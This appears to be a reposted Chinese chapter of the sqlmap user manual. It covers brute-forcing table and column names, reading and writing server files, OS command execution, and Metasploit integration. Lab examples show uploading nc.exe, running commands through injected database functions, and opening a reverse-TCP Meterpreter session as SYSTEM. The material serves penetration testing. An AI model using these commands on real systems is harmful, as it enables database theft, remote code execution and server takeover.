sqlmap用户手册(七)——爆破等
来源:互联网 发布:数据火影 编辑:程序博客网 时间:2024/05/14 15:52
爆破
暴力破解表名
参数:--common-tables
当使用--tables无法获取到数据库的表时,可以使用此参数。
通常是如下情况:
1、MySQL数据库版本小于5.0,没有information_schema表。2、数据库是Microssoft Access,系统表MSysObjects是不可读的(默认)。3、当前用户没有权限读取系统中保存数据结构的表的权限。
暴力破解的表在txt/common-tables.txt文件中,你可以自己添加。
列举一个MySQL 4.1的例子:
$ python sqlmap.py -u "http://192.168.136.129/mysql/get_int_4.php?id=1" --common-tables -D testdb --banner[...][hh:mm:39] [INFO] testing MySQL[hh:mm:39] [INFO] confirming MySQL[hh:mm:40] [INFO] the back-end DBMS is MySQL[hh:mm:40] [INFO] fetching bannerweb server operating system: Windowsweb application technology: PHP 5.3.1, Apache 2.2.14back-end DBMS operating system: Windowsback-end DBMS: MySQL < 5.0.0banner: '4.1.21-community-nt'[hh:mm:40] [INFO] checking table existence using items from '/software/sqlmap/txt/common-tables.txt'[hh:mm:40] [INFO] adding words used on web page to the check listplease enter number of threads? [Enter for 1 (current)] 8[hh:mm:43] [INFO] retrieved: usersDatabase: testdb[1 table]+-------+| users |+-------+
暴力破解列名
参数:--common-columns
与暴力破解表名一样,暴力跑的列名在txt/common-columns.txt中。
用户自定义函数注入
参数:--udf-inject,--shared-lib
你可以通过编译MySQL注入你自定义的函数(UDFs)或PostgreSQL在windows中共享库,DLL,或者Linux/Unix中共享对象,sqlmap将会问你一些问题,上传到服务器数据库自定义函数,然后根据你的选择执行他们,当你注入完成后,sqlmap将会移除它们。
系统文件操作
从数据库服务器中读取文件
参数:--file-read
当数据库为MySQL,PostgreSQL或Microsoft SQL Server,并且当前用户有权限使用特定的函数。读取的文件可以是文本也可以是二进制文件。
列举一个Microsoft SQL Server 2005的例子:
$ python sqlmap.py -u "http://192.168.136.129/sqlmap/mssql/iis/get_str2.asp?name=luther" \--file-read "C:/example.exe" -v 1[...][hh:mm:49] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windows 2000web application technology: ASP.NET, Microsoft IIS 6.0, ASPback-end DBMS: Microsoft SQL Server 2005[hh:mm:50] [INFO] fetching file: 'C:/example.exe'[hh:mm:50] [INFO] the SQL query provided returns 3 entriesC:/example.exe file saved to: '/software/sqlmap/output/192.168.136.129/files/C__example.exe'[...]$ ls -l output/192.168.136.129/files/C__example.exe -rw-r--r-- 1 inquis inquis 2560 2011-MM-DD hh:mm output/192.168.136.129/files/C__example.exe$ file output/192.168.136.129/files/C__example.exe output/192.168.136.129/files/C__example.exe: PE32 executable for MS Windows (GUI) Intel80386 32-bit
把文件上传到数据库服务器中
参数:--file-write,--file-dest
当数据库为MySQL,PostgreSQL或Microsoft SQL Server,并且当前用户有权限使用特定的函数。上传的文件可以是文本也可以是二进制文件。
列举一个MySQL的例子:
$ file /software/nc.exe.packed /software/nc.exe.packed: PE32 executable for MS Windows (console) Intel 80386 32-bit$ ls -l /software/nc.exe.packed-rwxr-xr-x 1 inquis inquis 31744 2009-MM-DD hh:mm /software/nc.exe.packed$ python sqlmap.py -u "http://192.168.136.129/sqlmap/mysql/get_int.aspx?id=1" --file-write \"/software/nc.exe.packed" --file-dest "C:/WINDOWS/Temp/nc.exe" -v 1[...][hh:mm:29] [INFO] the back-end DBMS is MySQLweb server operating system: Windows 2003 or 2008web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727back-end DBMS: MySQL >= 5.0.0[...]do you want confirmation that the file 'C:/WINDOWS/Temp/nc.exe' has been successfully written on the back-end DBMS file system? [Y/n] y[hh:mm:52] [INFO] retrieved: 31744[hh:mm:52] [INFO] the file has been successfully written and its size is 31744 bytes, same size as the local file '/software/nc.exe.packed'
运行任意操作系统命令
参数:--os-cmd,--os-shell
当数据库为MySQL,PostgreSQL或Microsoft SQL Server,并且当前用户有权限使用特定的函数。
在MySQL、PostgreSQL,sqlmap上传一个二进制库,包含用户自定义的函数,sys_exec()和sys_eval()。
那么他创建的这两个函数可以执行系统命令。在Microsoft SQL Server,sqlmap将会使用xp_cmdshell存储过程,如果被禁(在Microsoft SQL Server 2005及以上版本默认禁制),sqlmap会重新启用它,如果不存在,会自动创建。
列举一个PostgreSQL的例子:
$ python sqlmap.py -u "http://192.168.136.131/sqlmap/pgsql/get_int.php?id=1" \--os-cmd id -v 1[...]web application technology: PHP 5.2.6, Apache 2.2.9back-end DBMS: PostgreSQL[hh:mm:12] [INFO] fingerprinting the back-end DBMS operating system[hh:mm:12] [INFO] the back-end DBMS operating system is Linux[hh:mm:12] [INFO] testing if current user is DBA[hh:mm:12] [INFO] detecting back-end DBMS version from its banner[hh:mm:12] [INFO] checking if UDF 'sys_eval' already exist[hh:mm:12] [INFO] checking if UDF 'sys_exec' already exist[hh:mm:12] [INFO] creating UDF 'sys_eval' from the binary UDF file[hh:mm:12] [INFO] creating UDF 'sys_exec' from the binary UDF filedo you want to retrieve the command standard output? [Y/n/a] ycommand standard output: 'uid=104(postgres) gid=106(postgres) groups=106(postgres)'[hh:mm:19] [INFO] cleaning up the database management systemdo you want to remove UDF 'sys_eval'? [Y/n] ydo you want to remove UDF 'sys_exec'? [Y/n] y[hh:mm:23] [INFO] database management system cleanup finished[hh:mm:23] [WARNING] remember that UDF shared object files saved on the file system can only be deleted manually
用--os-shell参数也可以模拟一个真实的shell,可以输入你想执行的命令。
当不能执行多语句的时候(比如php或者asp的后端数据库为MySQL时),仍然可能使用INTO OUTFILE写进可写目录,来创建一个web后门。支持的语言:
1、ASP2、ASP.NET3、JSP4、PHP
Meterpreter配合使用
参数:--os-pwn,--os-smbrelay,--os-bof,--priv-esc,--msf-path,--tmp-path
当数据库为MySQL,PostgreSQL或Microsoft SQL Server,并且当前用户有权限使用特定的函数,可以在数据库与攻击者直接建立TCP连接,这个连接可以是一个交互式命令行的Meterpreter会话,sqlmap根据Metasploit生成shellcode,并有四种方式执行它:
1、通过用户自定义的sys_bineval()函数在内存中执行Metasplit的shellcode,支持MySQL和PostgreSQL数据库,参数:--os-pwn。2、通过用户自定义的函数上传一个独立的payload执行,MySQL和PostgreSQL的sys_exec()函数,Microsoft SQL Server的xp_cmdshell()函数,参数:--os-pwn。3、通过SMB攻击(MS08-068)来执行Metasploit的shellcode,当sqlmap获取到的权限足够高的时候(Linux/Unix的uid=0,Windows是Administrator),--os-smbrelay。4、通过溢出Microsoft SQL Server 2000和2005的sp_replwritetovarbin存储过程(MS09-004),在内存中执行Metasploit的payload,参数:--os-bof
列举一个MySQL例子:
$ python sqlmap.py -u "http://192.168.136.129/sqlmap/mysql/iis/get_int_55.aspx?id=1" --os-pwn --msf-path /software/metasploit[...][hh:mm:31] [INFO] the back-end DBMS is MySQLweb server operating system: Windows 2003web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0back-end DBMS: MySQL 5.0[hh:mm:31] [INFO] fingerprinting the back-end DBMS operating system[hh:mm:31] [INFO] the back-end DBMS operating system is Windowshow do you want to establish the tunnel?[1] TCP: Metasploit Framework (default)[2] ICMP: icmpsh - ICMP tunneling> [hh:mm:32] [INFO] testing if current user is DBA[hh:mm:32] [INFO] fetching current userwhat is the back-end database management system architecture?[1] 32-bit (default)[2] 64-bit> [hh:mm:33] [INFO] checking if UDF 'sys_bineval' already exist[hh:mm:33] [INFO] checking if UDF 'sys_exec' already exist[hh:mm:33] [INFO] detecting back-end DBMS version from its banner[hh:mm:33] [INFO] retrieving MySQL base directory absolute path[hh:mm:34] [INFO] creating UDF 'sys_bineval' from the binary UDF file[hh:mm:34] [INFO] creating UDF 'sys_exec' from the binary UDF filehow do you want to execute the Metasploit shellcode on the back-end database underlying operating system?[1] Via UDF 'sys_bineval' (in-memory way, anti-forensics, default)[2] Stand-alone payload stager (file system way)> [hh:mm:35] [INFO] creating Metasploit Framework multi-stage shellcode which connection type do you want to use?[1] Reverse TCP: Connect back from the database host to this machine (default)[2] Reverse TCP: Try to connect back from the database host to this machine, on all ports between the specified and 65535[3] Bind TCP: Listen on the database host for a connection> which is the local address? [192.168.136.1] which local port number do you want to use? [60641] which payload do you want to use?[1] Meterpreter (default)[2] Shell[3] VNC> [hh:mm:40] [INFO] creation in progress ... done[hh:mm:43] [INFO] running Metasploit Framework command line interface locally, please wait.. _ | | o_ _ _ _ _|_ __, , _ | | __ _|_/ |/ |/ | |/ | / | / \_|/ \_|/ / \_| || | |_/|__/|_/\_/|_/ \/ |__/ |__/\__/ |_/|_/ /| \| =[ metasploit v3.7.0-dev [core:3.7 api:1.0]+ -- --=[ 674 exploits - 351 auxiliary+ -- --=[ 217 payloads - 27 encoders - 8 nops =[ svn r12272 updated 4 days ago (2011.04.07)PAYLOAD => windows/meterpreter/reverse_tcpEXITFUNC => threadLPORT => 60641LHOST => 192.168.136.1[*] Started reverse handler on 192.168.136.1:60641 [*] Starting the payload handler...[hh:mm:48] [INFO] running Metasploit Framework shellcode remotely via UDF 'sys_bineval', please wait..[*] Sending stage (749056 bytes) to 192.168.136.129[*] Meterpreter session 1 opened (192.168.136.1:60641 -> 192.168.136.129:1689) at Mon Apr 11 hh:mm:52 +0100 2011meterpreter > Loading extension espia...success.meterpreter > Loading extension incognito...success.meterpreter > [-] The 'priv' extension has already been loaded.meterpreter > Loading extension sniffer...success.meterpreter > System Language : en_USOS : Windows .NET Server (Build 3790, Service Pack 2).Computer : W2K3R2Architecture : x86Meterpreter : x86/win32meterpreter > Server username: NT AUTHORITY\SYSTEMmeterpreter > ipconfigMS TCP Loopback interfaceHardware MAC: 00:00:00:00:00:00IP Address : 127.0.0.1Netmask : 255.0.0.0Intel(R) PRO/1000 MT Network ConnectionHardware MAC: 00:0c:29:fc:79:39IP Address : 192.168.136.129Netmask : 255.255.255.0meterpreter > exit[*] Meterpreter session 1 closed. Reason: User exit
默认情况下MySQL在Windows上以SYSTEM权限运行,PostgreSQL在Windows与Linux中是低权限运行,Microsoft SQL Server 2000默认是以SYSTEM权限运行,Microsoft SQL Server 2005与2008大部分是以NETWORK SERVICE有时是LOCAL SERVICE。
- sqlmap用户手册(七)——爆破等
- sqlmap用户手册(一)——综述
- sqlmap用户手册(三)——请求
- sqlmap用户手册(四)——注入
- sqlmap用户手册(五)——探测
- sqlmap用户手册(二)——获取目标方式
- sqlmap用户手册(六)——列数据
- sqlmap 用户手册(续)
- sqlmap 用户手册(续)
- SqlMap用户手册
- sqlmap用户手册
- SqlMap用户手册
- sqlmap用户手册
- sqlmap用户手册
- sqlmap用户手册
- sqlmap用户手册
- sqlmap用户手册
- SqlMap用户手册
- 位运算实现加法
- 直接通过ODBC读写Excel表格文件
- 针对Excel表格文件操作的编程实现(编译:徐景周)(转)
- python对文件进行读写操作
- sqlmap用户手册(六)——列数据
- sqlmap用户手册(七)——爆破等
- oracle 11g安装(windows+linux)
- IT行业智力测试题
- LINUX内核设计与实现之页高速缓存和页回写
- 使用 MFC 编写打印程序
- 错误:syntax error near unexpected token `then'
- position中z-index问题
- 揭秘中国16大暴利行业
- LeetCode:Binary Tree Preorder Traversal